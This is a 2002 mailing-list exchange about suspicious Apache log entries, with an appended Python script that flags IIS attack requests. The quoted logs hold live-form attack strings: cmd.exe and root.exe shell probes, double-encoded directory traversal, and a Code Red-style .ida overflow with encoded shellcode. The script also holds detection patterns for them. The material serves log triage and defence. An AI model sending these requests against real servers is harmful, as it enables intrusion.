Apache logs -- hack -- security

Tomas Valousek xvalous at pluto.pslib.cz
Tue Feb 19 19:45:24 CET 2002


On Tue, 19 Feb 2002 adam_1 at centrum.cz wrote:

> Hello linux,
> 
>   Good day. While going through my Apache logs today I came across
>   some things that look rather suspicious to me. Would anyone here
>   be able to tell me who was trying what? And also whether
>   something like this can be used to get hold of /bin/bash (I don't
>   want to say root, because any other user is enough, and from there
>   it is a matter of a few hours to get to root). If it is possible
>   to get in this way, what is the defence?
> I found this in the file /var/log/httpd/access_log
> ----------------------------------------------------------------------------------
> 212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
> 213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 322 "-" "-"

These are several ways of getting into IIS (that's that thingy from
those people for that thing). This most certainly cannot endanger Linux ;-).

BTW: if you enter part of that request into Google, it will find more
detailed information about these things.

-- 
	Tomas -VALY- Valousek
	web design, internet projects, linux etc..
email: tomas at valousek.cz
www:   http://www.pslib.cz/~xvalous 	(~=ALT+126)
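
An added example, not part of the original posts: a small Python triage script that labels IIS-targeted requests like the ones quoted above in an Apache access log and records whether any of them was answered with a non-error status. The signature names, function names and sample lines (with documentation-range addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote
# Fields used from Apache's combined log format: client, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Signatures modelled on the requests quoted in the thread (hypothetical labels).
SIGNATURES = [
    ("iis-shell-probe", re.compile(r'/(root|cmd)\.exe', re.I)),
    ("iis-ida-overflow", re.compile(r'\.ida\?', re.I)),
    ("dir-traversal", re.compile(r'\.\.[\\/]')),
]

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash becomes visible."""
    for _ in range(max_rounds):
        decoded = unquote(path)  # leaves malformed escapes such as %u9090 as-is
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return (client, status, [labels]), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, path, status = m.groups()
    labels = [name for name, rx in SIGNATURES if rx.search(fully_decode(path))]
    return client, int(status), labels

def summarize(lines):
    """Map client -> {'labels': set, 'served': bool}; served = status below 400."""
    report = {}
    for line in lines:
        hit = classify(line)
        if not hit or not hit[2]:
            continue  # unparsable line or no signature matched
        client, status, labels = hit
        entry = report.setdefault(client, {"labels": set(), "served": False})
        entry["labels"].update(labels)
        entry["served"] |= status < 400
    return report

# Constructed sample lines, shortened from the shapes quoted in the thread.
SAMPLE = [
    '192.0.2.10 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"',
    '198.51.100.7 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"',
    '203.0.113.5 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNN%u9090%u6858=a  HTTP/1.0" 400 322 "-" "-"',
    '192.0.2.99 - - [19/Feb/2002:12:00:00 +0100] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```

Calling `summarize(SAMPLE)` leaves every flagged client with `served` set to `False`, matching the 404 and 400 responses in the quoted log; a flagged request with a 2xx or 3xx status is the case that would need a closer look.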

	


